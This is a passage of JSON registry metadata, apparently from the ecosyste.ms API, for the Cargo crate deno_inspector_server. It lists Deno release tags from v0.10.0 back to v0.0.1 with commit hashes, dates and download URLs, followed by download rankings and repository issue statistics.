ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T21:30:07.559Z","dependent_packages_count":0,"downloads":48386,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":42.08426401840058,"dependent_repos_count":17.07132680061644,"dependent_packages_count":22.5632121360655,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":27.239600985027508},"purl":"pkg:cargo/deno_inspector_server","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_inspector_server","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_inspector_server","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_inspector_server/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,